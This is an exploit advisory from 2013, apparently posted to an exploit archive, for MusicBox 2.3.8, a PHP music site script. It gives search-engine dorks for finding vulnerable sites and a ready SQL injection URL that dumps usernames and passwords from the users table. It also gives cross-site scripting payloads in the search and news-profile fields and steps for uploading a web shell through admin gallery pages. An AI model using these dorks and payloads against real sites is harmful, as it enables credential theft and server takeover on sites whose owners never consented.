MusicBox 2.3.8 - Multiple Vulnerabilities



Platform:

PHP

Published:

2013-08-26

#Exploit Title 		: Musicbox 2.3.8 Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 25/08/2013
#Category		: Web Applications 
#Vendor                 : http://www.musicboxv2.com/
#Version 		: 1.0 - 2.3.8

#Dork   	
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008 
inurl:genre_albums.php?id=

#Vulnerability  	: SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability 
#Tested On 		: Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id
 

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go To Fiture Search

2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search

3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php

2. Login to Website

3. Go to Menu [ My News ]

4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>

And at Detials input your XSS or Text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability 

*Artist Galery

1. Go to Admin Page, And Login

2. Go to Upload Artist Image or Go to Link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At 

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Galery

1. Go to Admin Page, And Login

2. Go to Upload Album Image or Go to Link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select Option, Example Option "All Album", And Click Submit

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At 

http://site-target/album_gallery/Your_Backdoor.php


==========================================================================================